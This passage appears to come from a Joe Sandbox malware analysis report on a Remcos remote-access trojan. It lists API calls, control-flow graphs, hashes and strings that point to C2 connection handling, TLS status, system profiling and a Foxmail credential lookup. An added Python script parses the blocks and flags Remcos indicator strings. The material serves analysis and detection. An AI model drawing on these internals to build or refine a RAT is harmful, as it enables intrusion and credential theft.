                            • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                            • Opcode Fuzzy Hash: 5f6935a44d2555e3a9d5795660cee6edaaf8ceb71c721b5c00cde1a7094d04b6
                            • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
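The per-function summaries in this report (an `APIs` list with `Part of subcall function` entries, a `$`-joined `String ID` line, an `Opcode ID` and fuzzy hashes) are easier to pivot on once parsed into records. The Python below is an added example for this page; it is not Joe Sandbox code and not part of the Remcos sample. It parses blocks in that layout and flags those whose referenced strings contain indicator substrings seen on this page (`Rmc-`, `Connected | `, `TLS On`, `/stext `). The `SAMPLE` text is constructed to mirror the two function blocks above, the indicator labels are this editor's descriptions rather than Joe Sandbox signature names, and it is assumed that referenced strings never themselves contain `$`.

```python
"""Parse Joe Sandbox per-function summary blocks into records and triage them.

Added example for this report page; it is not Joe Sandbox code and not part of
the Remcos sample. SAMPLE is constructed to mirror the layout of the two
function blocks above, and INDICATORS carries this editor's labels for strings
that appear on this page."""
import re

# Constructed input in the report's own layout (bullets, subcall indentation,
# "$"-joined String ID line).
SAMPLE = """\
APIs
• Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
• WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
Strings
Memory Dump Source
• Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Sleep$ErrorLastLocalTime
• String ID: | $%I64u$5.1.1 Pro$Connected | $Rmc-OT0ZCG$TLS Off$TLS On
• Opcode ID: 79288536e4165c6157248710647f71f23426609ae1f89b193eceedb6e23a3c7b
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
• DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Similarity
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$0TG$NG
• Opcode ID: 5f6935a44d2555e3a9d5795660cee6edaaf8ceb71c721b5c00cde1a7094d04b6
"""

# Substrings copied from String ID lines on this page; the labels are mine.
INDICATORS = {
    "Rmc-": "mutex-style Rmc- prefix",
    "Connected | ": "C2 status string",
    "TLS On": "TLS toggle string",
    "/stext ": "/stext switch",
}

_API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
_KV_RE = re.compile(r"^(?P<key>[A-Za-z][A-Za-z ]*): (?P<val>.*)$")


def _clean(line):
    """Drop the bullet and the whitespace the HTML export leaves around it."""
    return line.strip().lstrip("•").strip()


def parse_blocks(text):
    """Return one dict per function block: apis, strings, meta."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line == "APIs":            # every block starts with this header
            cur = {"apis": [], "strings": [], "meta": {}}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = _API_RE.match(line)
        if m:
            cur["apis"].append({
                "function": m["fn"],
                "module": m["mod"],
                "args": m["args"].split(",") if m["args"] is not None else [],
                "ref": int(m["ref"], 16),
                "subcall_of": int(m["sub"], 16) if m["sub"] else None,
            })
            continue
        m = _KV_RE.match(line)
        if m:
            if m["key"] == "String ID":
                # Strings are "$"-joined; assumed never to contain "$" themselves.
                cur["strings"] = [s for s in m["val"].split("$") if s]
            else:
                cur["meta"][m["key"]] = m["val"]
    return blocks


def triage(blocks, indicators=INDICATORS):
    """List blocks whose referenced strings contain any indicator substring."""
    hits = []
    for b in blocks:
        matched = sorted({label for needle, label in indicators.items()
                          if any(needle in s for s in b["strings"])})
        if matched:
            hits.append({
                "opcode_id": b["meta"].get("Opcode ID", "")[:16],
                "indicators": matched,
                "apis": sorted({a["function"] for a in b["apis"]}),
            })
    return hits


if __name__ == "__main__":
    for hit in triage(parse_blocks(SAMPLE)):
        print(hit["opcode_id"], hit["indicators"], hit["apis"])
```

Run against a full export, the `Opcode ID` of each hit is the stable key to carry into other reports of the same family; the `ref` addresses are image-relative to the dump's `Offset` and are only comparable within one dump.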

                            Control-flow Graph

                            APIs
                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                              • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                            • lstrlenW.KERNEL32(?), ref: 100014C5
                            • lstrlenW.KERNEL32(?), ref: 100014E0
                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                            • String ID: )$Foxmail$ProgramFiles
                            • API String ID: 672098462-2938083778
                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                            Control-flow Graph

                            control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1302 414ed4-414ee5 GetProcAddress 1300->1302 1304 414ee7-414eeb 1302->1304 1305 414eef-414ef2 FreeLibrary 1302->1305 1304->1302 1307 414eed 1304->1307 1308 414ef4-414ef6 1305->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                            • LoadLibraryA.KERNEL32(?), ref: 00414E52
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                            • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                            • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                            • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-744132762
                            • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                            • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                            • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                            • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                            Control-flow Graph

                            control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1349 404950-404973 call 402093 * 2 call 41b580 1336->1349 1350 404987-404992 call 421ad1 1336->1350 1337->1329 1376 404976-404982 call 420d31 1349->1376 1361 4049c4-4049d1 call 420e97 1350->1361 1362 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1350->1362 1372 4049d3-4049f6 call 402093 * 2 call 41b580 1361->1372 1373 4049f9-404a14 CreateEventW * 2 1361->1373 1362->1376 1372->1373 1373->1317 1376->1320
                            APIs
                            • connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                            • WSAGetLastError.WS2_32 ref: 00404A21
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                            • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                            • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                            • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                            Control-flow Graph

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • CloseHandle.KERNEL32(?), ref: 00404E4C
                            • closesocket.WS2_32(000000FF), ref: 00404E5A
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                            • CloseHandle.KERNEL32(?), ref: 00404EBF
                            • CloseHandle.KERNEL32(?), ref: 00404EC4
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                            • CloseHandle.KERNEL32(?), ref: 00404ED6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                            • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                            • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                            • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                            Control-flow Graph

                            control_flow_graph 1406 40da6f-40da94 call 401f86 1409 40da9a 1406->1409 1410 40dbbe-40dc56 call 401f04 GetLongPathNameW call 40417e * 2 call 40de0c call 402fa5 * 2 call 401f09 * 5 1406->1410 1412 40dae0-40dae7 call 41c048 1409->1412 1413 40daa1-40daa6 1409->1413 1414 40db93-40db98 1409->1414 1415 40dad6-40dadb 1409->1415 1416 40dba9 1409->1416 1417 40db9a-40db9f call 43c11f 1409->1417 1418 40daab-40dab9 call 41b645 call 401f13 1409->1418 1419 40dacc-40dad1 1409->1419 1420 40db8c-40db91 1409->1420 1432 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1412->1432 1433 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1412->1433 1422 40dbae-40dbb3 call 43c11f 1413->1422 1414->1422 1415->1422 1416->1422 1428 40dba4-40dba7 1417->1428 1437 40dabe 1418->1437 1419->1422 1420->1422 1434 40dbb4-40dbb9 call 409092 1422->1434 1428->1416 1428->1434 1442 40dac2-40dac7 call 401f09 1432->1442 1433->1437 1434->1410 1437->1442 1442->1410
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: LongNamePath
                            • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                            • API String ID: 82841172-425784914
                            • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                            • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                            • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                            • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                            Control-flow Graph

                            control_flow_graph 1488 44acc9-44ace2 1489 44ace4-44acf4 call 4467e6 1488->1489 1490 44acf8-44acfd 1488->1490 1489->1490 1497 44acf6 1489->1497 1492 44acff-44ad07 1490->1492 1493 44ad0a-44ad2e MultiByteToWideChar 1490->1493 1492->1493 1495 44ad34-44ad40 1493->1495 1496 44aec1-44aed4 call 43502b 1493->1496 1498 44ad94 1495->1498 1499 44ad42-44ad53 1495->1499 1497->1490 1501 44ad96-44ad98 1498->1501 1502 44ad55-44ad64 call 457210 1499->1502 1503 44ad72-44ad83 call 4461b8 1499->1503 1506 44aeb6 1501->1506 1507 44ad9e-44adb1 MultiByteToWideChar 1501->1507 1502->1506 1516 44ad6a-44ad70 1502->1516 1503->1506 1513 44ad89 1503->1513 1511 44aeb8-44aebf call 435ecd 1506->1511 1507->1506 1510 44adb7-44adc9 call 448c33 1507->1510 1518 44adce-44add2 1510->1518 1511->1496 1517 44ad8f-44ad92 1513->1517 1516->1517 1517->1501 1518->1506 1520 44add8-44addf 1518->1520 1521 44ade1-44ade6 1520->1521 1522 44ae19-44ae25 1520->1522 1521->1511 1525 44adec-44adee 1521->1525 1523 44ae27-44ae38 1522->1523 1524 44ae71 1522->1524 1526 44ae53-44ae64 call 4461b8 1523->1526 1527 44ae3a-44ae49 call 457210 1523->1527 1528 44ae73-44ae75 1524->1528 1525->1506 1529 44adf4-44ae0e call 448c33 1525->1529 1533 44aeaf-44aeb5 call 435ecd 1526->1533 1544 44ae66 1526->1544 1527->1533 1542 44ae4b-44ae51 1527->1542 1532 44ae77-44ae90 call 448c33 1528->1532 1528->1533 1529->1511 1541 44ae14 1529->1541 1532->1533 1545 44ae92-44ae99 1532->1545 1533->1506 1541->1506 1546 44ae6c-44ae6f 1542->1546 1544->1546 1547 44aed5-44aedb 1545->1547 1548 44ae9b-44ae9c 1545->1548 1546->1528 1549 44ae9d-44aead WideCharToMultiByte 1547->1549 1548->1549 1549->1533 1550 44aedd-44aee4 call 435ecd 1549->1550 1550->1511
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                            • __alloca_probe_16.LIBCMT ref: 0044AD5B
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                            • __alloca_probe_16.LIBCMT ref: 0044AE40
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                            • __freea.LIBCMT ref: 0044AEB0
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • __freea.LIBCMT ref: 0044AEB9
                            • __freea.LIBCMT ref: 0044AEDE
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                            • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                            • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                            • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

                            Control-flow Graph

                            control_flow_graph 1634 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1645 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1634->1645 1646 41b3ee-41b3f7 1634->1646 1656 41b3e6-41b3e9 call 401fd8 1645->1656 1657 41b3da-41b3e3 call 41cffa 1645->1657 1647 41b400 1646->1647 1648 41b3f9-41b3fe 1646->1648 1650 41b405-41b410 call 40537d 1647->1650 1648->1650 1656->1646 1657->1656
                            APIs
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                              • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                              • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                              • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                            • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCurrentOpenQueryValueWow64
                            • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            • API String ID: 782494840-2070987746
                            • Opcode ID: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                            • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                            • Opcode Fuzzy Hash: a9c02e874ac761b1a54f69f9c7c0e468dff2f28919116cd580da9d812710a803
                            • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                            • __freea.LIBCMT ref: 10008A08
                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                            • __freea.LIBCMT ref: 10008A11
                            • __freea.LIBCMT ref: 10008A36
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                            • String ID:
                            • API String ID: 1414292761-0
                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountEventTick
                            • String ID: !D@$NG
                            • API String ID: 180926312-2721294649
                            • Opcode ID: 057d7f0dcf3640348c68adfe9d1ca76fd8cc1f974dc32ec21b4205a70dcdf678
                            • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                            • Opcode Fuzzy Hash: 057d7f0dcf3640348c68adfe9d1ca76fd8cc1f974dc32ec21b4205a70dcdf678
                            • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                            APIs
                              • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                              • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                              • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                              • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                              • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                              • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                              • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                            • _free.LIBCMT ref: 10006CD7
                            • _free.LIBCMT ref: 10006D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorLast_abort
                            • String ID: xV$xV
                            • API String ID: 2991157371-3041289288
                            • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                            • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                            • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                            • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                            APIs
                            • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                            • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                            • Opcode Fuzzy Hash: 428bc55d4a31c43cbc360544c684b23c3ac7d4a2dd682b4fcf6922528a401838
                            • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                            APIs
